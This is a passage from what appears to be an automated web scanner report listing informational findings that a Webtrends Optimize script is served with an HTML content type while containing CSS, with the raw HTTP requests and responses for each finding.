65d8e1a68a095618f24d537f69227a5c75e0068177a7009b4c1f6a659f25ce2544c00c45df23724c3ce75728995b1c5f808a9006f510d6f449f5b7d5faae280ba17fa7d8ac24d2223304dcad0e4c9c66065ce714112788a741f5ffe4ac4ccb543a06d416509a2594d0a9c5aac62639b1e2461dcbc023d4f94ec670a4d90a393d281eee7ac1a7a6d12abc7a3f36121634921c13481c87cdc5e3686328d4c84357836d17b2d9d378343b8120704ef2f68797a71475c58673cb80d0776b2a028abc59e54fdc29c1a84af3f644c147abf2c1f2d454a330a0c3c489d958b4cb79bb3eb21ec1da3a76b519e28710c34cba3da7bf10e5b263108fb57711b6771ccfaa872df7109e44d9474019da921e85684f46b420d62184a4c2d59def5c85060d23bd3877af6ccfe11a507a7e7bdd1d3bc9a4f84c33b9139ec9e7d91cc36e42f0b9df9ade25fb8a7e26304ec1d62979c0329521127e7621277e081406186f6c361c9e1ff0fd840c78037c6205b105160f4a2fc9ac41294ac9bda016e9f630dede55b8a8ac0407857d2f18f2022f5bfb0f1094c1b56477849fa2acea99f60fe8023330d7  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2f67577bacd75f1782291db413e5148500103e9901f9138f3ecc45e1a17351e327846c1b8e797a0b3a413d308571a1642331ee41fbb8e7a116b4a76f41fdcb35b053e4fd0d4f4887a3e6fa9f9444be3347958846ece8717f653867a1bb55d084039dae6cd593e38cf3381b76f9412798114c13eee60d18ac04040f44e23a0def691164a4690571135ce1499229d752a7fbf8e53656e8a18bdf9f1fd25ae761ed3c7dec882b3b64609e6a6e20dbcfbcdb912759d584f823b5185ca4150ce4959a07dcff5ac53a16139211b0cb556cd69fb48a1dcba5d60771222daaf009b778966d228b012178fdd609edcf90d5924bf310972473f54a1ffc20583ba6b3c76a1733f00ac936579c56bdb60da65a9ef207789fc91bb93a6ca847c3b11dee47cf4582777ca82607b566da1ccb2577e7ff60f75eeb51d8656a6b645d99f3c6ead5327d90edb68d8e9ff88afbe1146d49e4ce9dc38c05471a854c68478d038a5b022672d555ce40ada2b5ad02e6380f00e53b7603302fc6375e60652af6ee7c7f9733204e3717403e0196c249c4cea1b479e5537d8a22e039104d2d3cbcb2ba35565e471fb92980b396aa148d4d55cfdb2344aa46c14907ae71fac1059caa22f88cb5610a1b30e974a7a71d2e3e002299986f1f1d8463caf5a530f393a3fc5a8866ff455326077ad9c3410e595256efb41a1d5a83b0801c5841eee0e1418a5ce41416d89bb7cfe1310a2c13b91d927d592168f95eb77fc9d4ae95593766a20e9843d6d2ffa2d61a7e41725babc745d8400eeeafd00dbbc4e265d8e1a68a095618f24d537f69227a5c75e0068177a7009b4c1f6a659f25ce2544c00c45df23724c3ce75728995b1c5f808a9006f510d6f449f5b7d5faae280ba17fa7d8ac24d2223304dcad0e4c9c66065ce714112788a741f5ffe4ac4ccb543a06d416509a2594d0a9c5aac62639b1e2461dcbc023d4f94ec670a4d90a393d281eee7ac1a7a6d12abc7a3f36121634921c13481c87cdc5e3686328d4c84357836d17b2d9d378343b8120704ef2f68797a71475c58673cb80d0776b2a028abc59e54fdc29c1a84af3f644c147abf2c1f2d454a330a0c3c489d958b4cb79bb3eb21ec1da3a76b519e28710c34cba3da7bf10e5b263108fb57711b6771ccfaa872df7109e44d9474019da921e85684f46b420d62184a4c2d59def5c85060d23bd3877af6ccfe11a507a7e7bdd1d3bc9a4f84c33b9139ec9e7d91cc36e42f0b9df9ade25fb8a7e26304ec1d62979c0329521127e7621277e081406186f6c361c9e1ff0fd840c78037c6205b105160f4a2fc9ac41294ac9bda016e9f630dede55b8a8ac0407857d2f18f2022f5bfb0f1094c1b56477849fa2acea99f60fe8023330d7

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2f67577bacd75f1782291db413e5148500103e9901f9138f3ecc45e1a17351e327846c1b8e797a0b3a413d308571a1642331ee41fbb8e7a116b4a76f41fdcb35b053e4fd0d4f4887a3e6fa9f9444be3347958846ece8717f653867a1bb55d084039dae6cd593e38cf3381b76f9412798114c13eee60d18ac04040f44e23a0def691164a4690571135ce1499229d752a7fbf8e53656e8a18bdf9f1fd25ae761ed3c7dec882b3b64609e6a6e20dbcfbcdb912759d584f823b5185ca4150ce4959a07dcff5ac53a16139211b0cb556cd69fb48a1dcba5d60771222daaf009b778966d228b012178fdd609edcf90d5924bf310972473f54a1ffc20583ba6b3c76a1733f00ac936579c56bdb60da65a9ef207789fc91bb93a6ca847c3b11dee47cf4582777ca82607b566da1ccb2577e7ff60f75eeb51d8656a6b645d99f3c6ead5327d90edb68d8e9ff88afbe1146d49e4ce9dc38c05471a854c68478d038a5b022672d555ce40ada2b5ad02e6380f00e53b7603302fc6375e60652af6ee7c7f9733204e3717403e0196c249c4cea1b479e5537d8a22e039104d2d3cbcb2ba35565e471fb92980b396aa148d4d55cfdb2344aa46c14907ae71fac1059caa22f88cb5610a1b30e974a7a71d2e3e002299986f1f1d8463caf5a530f393a3fc5a8866ff455326077ad9c3410e595256efb41a1d5a83b0801c5841eee0e1418a5ce41416d89bb7cfe1310a2c13b91d927d592168f95eb77fc9d4ae95593766a20e9843d6d2ffa2d61a7e41725babc745d8400eeeafd00dbbc4e265d8e1a68a095618f24d537f69227a5c75e0068177a7009b4c1f6a659f25ce2544c00c45df23724c3ce75728995b1c5f808a9006f510d6f449f5b7d5faae280ba17fa7d8ac24d2223304dcad0e4c9c66065ce714112788a741f5ffe4ac4ccb543a06d416509a2594d0a9c5aac62639b1e2461dcbc023d4f94ec670a4d90a393d281eee7ac1a7a6d12abc7a3f36121634921c13481c87cdc5e3686328d4c84357836d17b2d9d378343b8120704ef2f68797a71475c58673cb80d0776b2a028abc59e54fdc29c1a84af3f644c147abf2c1f2d454a330a0c3c489d958b4cb79bb3eb21ec1da3a76b519e28710c34cba3da7bf10e5b263108fb57711b6771ccfaa872df7109e44d9474019da921e85684f46b420d62184a4c2d59def5c85060d23bd3877af6ccfe11a507a7e7bdd1d3bc9a4f84c33b9139ec9e7d91cc36e42f0b9df9ade25fb8a7e26304ec1d62979c0329521127e7621277e081406186f6c361c9e1ff0fd840c78037c6205b105160f4a2fc9ac41294ac9bda016e9f630dede55b8a8ac0407857d2f18f2022f5bfb0f1094c1b56477849fa2acea99f60fe8023330d7 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/international-bank-account.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=59A67E9E4A42771D4AE9AAE699FFE647; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a00bb0854; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d016e163d; _wt.mode-79569=fcdcc722e93203b7c335

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:29:51 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: _wt.mode-79569=fcdcc722e9320333bd69; Path=/
Set-Cookie: _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a031a36ee; Expires=Sun, 01-Jan-2012 00:29:51 GMT; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 44561


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
28.55. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de88e91464e5c4f2e7e8b8e49c8e96f5952759fe24f09ca0f15b409ee09d35f106fda52ad4acb239f08b1b22975f829847a1bb97a632454077f22bd60e9752737af17b7f3a5e043e5fb2b19ff8a2da930eafc40001ec2a2e1a5c6d419b92b42da9e42b3f8727d752a7ce9a85cd79c4290b2689893e191e2335b7ff9456a8b5c025fe8e71214bb19474156af0428dc1727449e476e453c60e8049f6ec158e3a4f7ad2316b8e3d585921f8c1ab82eff410983ea1e4c0447e1091a4989d5e5ca8c772fc585ef589e6c18e5770df3ce9d109fbf1baa4d753cfb7197a13767bfd8e2d14b87f4cf4d29741fbcc70fa847d12576df4a6230a7bc7a88b7fbafe62c9210fd7937a40e46bd53123cbba5ea5c1d28ff40d12e44d110f0e51abe4ff7995c3dc69d0ab6366db646c2a200f4019510c70237ed765ea069c151816824ebe271991eaa46942e372f675b93f7c7e6ce3167cde2a18dc885e9b4c2f552631ff3c3d9c2960d170dd71e70158604df5f0c2f7dde51db55baccd8b915ee6a1c5cf269621d2543fc71496b7e3ffda879669731204e331d1a320ec6881bd399bff46fea0438cc32a9287d033f76a8a7e8701d5c1f13ee71c3e8d1ad16894b54c88e7314ad41c24c59ac72a9c003ccf770fd89b5395b4934e127f6f94f7a6b037099986d18478b6dc0f0f36bf5c5f5fe5a8c66f64651775328d7c610525e5052bab44c1d0bd0b68e465a46edb0ee4d8356b64518d9cbbec8b3655f2b48b94a95785d2c39f90fb7739cd2ff9a0e3660f30e994fd584eae897713e063a0df69a09ce1654f6a18a0cecc5a9248fdbf48379130dff507b252a176f0d66b076f42de6098b1a423561c574c47147c00610db74751a6fe0032791554f56dadec65bf44580f546f7b882f6a82759fd2fa38cac2dd7723455dfa0584cc56f0149f2047c69c9ea12a2a6a1ef409f1a6e0687105c8f37c7b9aac58e856536ff95100fab837590a86be078b3861a39337049be29c6faa1d62be77f6e36471033c044121d4fd391c2e43b6777d3c8165f8c3f17b68c8077343784267e1aa2fad295a01720c88b24c4dbd275602c0582b75ce24a8a73c3f816a0a349ca42a8f596f1d557a165f2cbcbdf8e4dabdd45a82efa46cb8c3a6ce346e4d71cd914f969fde916b0e36614d9ed7c40b0201b9efd832ffb008205b62a2e6bb8b20a88781f15f53ac31de2e5878acdfe5392531b70bc3974a43dc4e11f55607a2a8d196bc5f8f84766a613c8cab4dc11c8304ef3a0888bc33091c4333065178b822662db58fc6d442936657e385a59001e73383f019d1cf3ae800d795f74760bbf701d0f790be7ed5931019cbdf149cb04701d25  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de88e91464e5c4f2e7e8b8e49c8e96f5952759fe24f09ca0f15b409ee09d35f106fda52ad4acb239f08b1b22975f829847a1bb97a632454077f22bd60e9752737af17b7f3a5e043e5fb2b19ff8a2da930eafc40001ec2a2e1a5c6d419b92b42da9e42b3f8727d752a7ce9a85cd79c4290b2689893e191e2335b7ff9456a8b5c025fe8e71214bb19474156af0428dc1727449e476e453c60e8049f6ec158e3a4f7ad2316b8e3d585921f8c1ab82eff410983ea1e4c0447e1091a4989d5e5ca8c772fc585ef589e6c18e5770df3ce9d109fbf1baa4d753cfb7197a13767bfd8e2d14b87f4cf4d29741fbcc70fa847d12576df4a6230a7bc7a88b7fbafe62c9210fd7937a40e46bd53123cbba5ea5c1d28ff40d12e44d110f0e51abe4ff7995c3dc69d0ab6366db646c2a200f4019510c70237ed765ea069c151816824ebe271991eaa46942e372f675b93f7c7e6ce3167cde2a18dc885e9b4c2f552631ff3c3d9c2960d170dd71e70158604df5f0c2f7dde51db55baccd8b915ee6a1c5cf269621d2543fc71496b7e3ffda879669731204e331d1a320ec6881bd399bff46fea0438cc32a9287d033f76a8a7e8701d5c1f13ee71c3e8d1ad16894b54c88e7314ad41c24c59ac72a9c003ccf770fd89b5395b4934e127f6f94f7a6b037099986d18478b6dc0f0f36bf5c5f5fe5a8c66f64651775328d7c610525e5052bab44c1d0bd0b68e465a46edb0ee4d8356b64518d9cbbec8b3655f2b48b94a95785d2c39f90fb7739cd2ff9a0e3660f30e994fd584eae897713e063a0df69a09ce1654f6a18a0cecc5a9248fdbf48379130dff507b252a176f0d66b076f42de6098b1a423561c574c47147c00610db74751a6fe0032791554f56dadec65bf44580f546f7b882f6a82759fd2fa38cac2dd7723455dfa0584cc56f0149f2047c69c9ea12a2a6a1ef409f1a6e0687105c8f37c7b9aac58e856536ff95100fab837590a86be078b3861a39337049be29c6faa1d62be77f6e36471033c044121d4fd391c2e43b6777d3c8165f8c3f17b68c8077343784267e1aa2fad295a01720c88b24c4dbd275602c0582b75ce24a8a73c3f816a0a349ca42a8f596f1d557a165f2cbcbdf8e4dabdd45a82efa46cb8c3a6ce346e4d71cd914f969fde916b0e36614d9ed7c40b0201b9efd832ffb008205b62a2e6bb8b20a88781f15f53ac31de2e5878acdfe5392531b70bc3974a43dc4e11f55607a2a8d196bc5f8f84766a613c8cab4dc11c8304ef3a0888bc33091c4333065178b822662db58fc6d442936657e385a59001e73383f019d1cf3ae800d795f74760bbf701d0f790be7ed5931019cbdf149cb04701d25

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de88e91464e5c4f2e7e8b8e49c8e96f5952759fe24f09ca0f15b409ee09d35f106fda52ad4acb239f08b1b22975f829847a1bb97a632454077f22bd60e9752737af17b7f3a5e043e5fb2b19ff8a2da930eafc40001ec2a2e1a5c6d419b92b42da9e42b3f8727d752a7ce9a85cd79c4290b2689893e191e2335b7ff9456a8b5c025fe8e71214bb19474156af0428dc1727449e476e453c60e8049f6ec158e3a4f7ad2316b8e3d585921f8c1ab82eff410983ea1e4c0447e1091a4989d5e5ca8c772fc585ef589e6c18e5770df3ce9d109fbf1baa4d753cfb7197a13767bfd8e2d14b87f4cf4d29741fbcc70fa847d12576df4a6230a7bc7a88b7fbafe62c9210fd7937a40e46bd53123cbba5ea5c1d28ff40d12e44d110f0e51abe4ff7995c3dc69d0ab6366db646c2a200f4019510c70237ed765ea069c151816824ebe271991eaa46942e372f675b93f7c7e6ce3167cde2a18dc885e9b4c2f552631ff3c3d9c2960d170dd71e70158604df5f0c2f7dde51db55baccd8b915ee6a1c5cf269621d2543fc71496b7e3ffda879669731204e331d1a320ec6881bd399bff46fea0438cc32a9287d033f76a8a7e8701d5c1f13ee71c3e8d1ad16894b54c88e7314ad41c24c59ac72a9c003ccf770fd89b5395b4934e127f6f94f7a6b037099986d18478b6dc0f0f36bf5c5f5fe5a8c66f64651775328d7c610525e5052bab44c1d0bd0b68e465a46edb0ee4d8356b64518d9cbbec8b3655f2b48b94a95785d2c39f90fb7739cd2ff9a0e3660f30e994fd584eae897713e063a0df69a09ce1654f6a18a0cecc5a9248fdbf48379130dff507b252a176f0d66b076f42de6098b1a423561c574c47147c00610db74751a6fe0032791554f56dadec65bf44580f546f7b882f6a82759fd2fa38cac2dd7723455dfa0584cc56f0149f2047c69c9ea12a2a6a1ef409f1a6e0687105c8f37c7b9aac58e856536ff95100fab837590a86be078b3861a39337049be29c6faa1d62be77f6e36471033c044121d4fd391c2e43b6777d3c8165f8c3f17b68c8077343784267e1aa2fad295a01720c88b24c4dbd275602c0582b75ce24a8a73c3f816a0a349ca42a8f596f1d557a165f2cbcbdf8e4dabdd45a82efa46cb8c3a6ce346e4d71cd914f969fde916b0e36614d9ed7c40b0201b9efd832ffb008205b62a2e6bb8b20a88781f15f53ac31de2e5878acdfe5392531b70bc3974a43dc4e11f55607a2a8d196bc5f8f84766a613c8cab4dc11c8304ef3a0888bc33091c4333065178b822662db58fc6d442936657e385a59001e73383f019d1cf3ae800d795f74760bbf701d0f790be7ed5931019cbdf149cb04701d25 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/about-us/corporate-social-responsibility.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=93530B2177889BE5371E306CA55F4229; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc2008dfa14; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d042f457f; _wt.mode-79569=fcdcc722e93202d188d0

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:03:06 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=27DB104FF240B21CA30EC91928AC60D3; Path=/ots
Set-Cookie: _wt.mode-79569=fcdcc722e93201f611e1; Path=/
Set-Cookie: _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a059683f7; Expires=Sun, 01-Jan-2012 00:03:06 GMT; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 44561


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
28.56. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392deb9e91585f035b3a35cd925087e761247a6fade9720dc2253cb41cf81885470770d955ab4acb239f14bfe72a4ddb25c56203f36663201e127f7abd60b0392424be18baebafe451e1f63305b9c721ab72a4f74205059da3f3e4d19602a7225fc98746eae27270322364a9f84488ce4e91ae6a939ffedaac315747c9771ba2317479c1dd3522b852064815ef645eae714a67f92f1921145aa35e9969c917e3a6ebf92c40e9f7d28cc04e8342ff3ffd2a1b9ff93d33774ca86c470dcb92ad9fd92936a0fb8345836e22c11737f2cc991681ac289d7e5302fb55bd9d0f76da89a7890bd6a1a5116a365bcd8654f218c63164de43662abdab3dd6e7bdc7b26cc44bea6d25e04c03fa5d1c6d8d9ced6e153dbe12d125489453b4b100a75e9bf11a679acf19bb2165a14fcba51ffd079714c50820e47d59b96dcb598e652bfceb7a9e07ae5d813450463c1ecda4d2e9d53971c4e5a18dda87fad8acb7133744e9c1cdd1941e797c935a3347970fca5b173a67b9388c0df5e9a5f643b2270f55e16f75083e249b3213372a2ce9ff3c25c571635b2a067c7d42ded35998dabcb622b251729c2aa76f1b4d7a3cebe7ec6451594512ed7f87e2c7f243d24d019d8c7e13ad44c44e08af75ffcf03cca073ac88e6695f4f67e671f3ac1a796a5370cd913d1849836ac9f1f23aa297a1ab08da6ba0130026547dd8c1170f58565beab11e480e81e48d450243bfe5b61dd253e4431988cdeac8b0645d2e13b24a932e0f7935ad5ee0299184ad98013035f80ecc4cd6d5beb6c2766a03640af7cf08981f57f2aed80cb49ba973888da08d2c425aa8007e717b426d0c37ea7fa07ab55e8f101f6a32c829c82219c00b418d227c466ce5527499081d588fdfc201a24f82f44ba1b6d2fff9784cb56fcd9dbd32d27e68119df750079367005de70b577fe2f5408cb8a5f156bd582e6cc643159002e488b9ceed902c63b7b84a4a9d9276d3f81d9620a28d093d33704eb82ccdfef7d42de37d6a36441761954b1d4e12d19d91b2673122d399135a883a1bb889d27634308f762549a9f88297f61d25938a71c3d7d8216b2f5483ea58e018de7299fe1cf1a0489140fea591a58201a567a3c1948f8518f9db1ffe2faa1599886c3aba43e1d54c8742af6afde943e5bd6813debe2715b17647cfaa8229a10b8657bc222c6abfb504dd7a1610a568cc4de9e7828d9eac55c202462abf6a77a63cceb61d5764797fdf126fd2b1e22b72e30cc097b48908cd6f4ff0aecc93cd74add7247d3f4add823266d05dfe655f27243a2d7e151860781e1b56718d16e3a3d5173c463904e857fd  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392deb9e91585f035b3a35cd925087e761247a6fade9720dc2253cb41cf81885470770d955ab4acb239f14bfe72a4ddb25c56203f36663201e127f7abd60b0392424be18baebafe451e1f63305b9c721ab72a4f74205059da3f3e4d19602a7225fc98746eae27270322364a9f84488ce4e91ae6a939ffedaac315747c9771ba2317479c1dd3522b852064815ef645eae714a67f92f1921145aa35e9969c917e3a6ebf92c40e9f7d28cc04e8342ff3ffd2a1b9ff93d33774ca86c470dcb92ad9fd92936a0fb8345836e22c11737f2cc991681ac289d7e5302fb55bd9d0f76da89a7890bd6a1a5116a365bcd8654f218c63164de43662abdab3dd6e7bdc7b26cc44bea6d25e04c03fa5d1c6d8d9ced6e153dbe12d125489453b4b100a75e9bf11a679acf19bb2165a14fcba51ffd079714c50820e47d59b96dcb598e652bfceb7a9e07ae5d813450463c1ecda4d2e9d53971c4e5a18dda87fad8acb7133744e9c1cdd1941e797c935a3347970fca5b173a67b9388c0df5e9a5f643b2270f55e16f75083e249b3213372a2ce9ff3c25c571635b2a067c7d42ded35998dabcb622b251729c2aa76f1b4d7a3cebe7ec6451594512ed7f87e2c7f243d24d019d8c7e13ad44c44e08af75ffcf03cca073ac88e6695f4f67e671f3ac1a796a5370cd913d1849836ac9f1f23aa297a1ab08da6ba0130026547dd8c1170f58565beab11e480e81e48d450243bfe5b61dd253e4431988cdeac8b0645d2e13b24a932e0f7935ad5ee0299184ad98013035f80ecc4cd6d5beb6c2766a03640af7cf08981f57f2aed80cb49ba973888da08d2c425aa8007e717b426d0c37ea7fa07ab55e8f101f6a32c829c82219c00b418d227c466ce5527499081d588fdfc201a24f82f44ba1b6d2fff9784cb56fcd9dbd32d27e68119df750079367005de70b577fe2f5408cb8a5f156bd582e6cc643159002e488b9ceed902c63b7b84a4a9d9276d3f81d9620a28d093d33704eb82ccdfef7d42de37d6a36441761954b1d4e12d19d91b2673122d399135a883a1bb889d27634308f762549a9f88297f61d25938a71c3d7d8216b2f5483ea58e018de7299fe1cf1a0489140fea591a58201a567a3c1948f8518f9db1ffe2faa1599886c3aba43e1d54c8742af6afde943e5bd6813debe2715b17647cfaa8229a10b8657bc222c6abfb504dd7a1610a568cc4de9e7828d9eac55c202462abf6a77a63cceb61d5764797fdf126fd2b1e22b72e30cc097b48908cd6f4ff0aecc93cd74add7247d3f4add823266d05dfe655f27243a2d7e151860781e1b56718d16e3a3d5173c463904e857fd

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

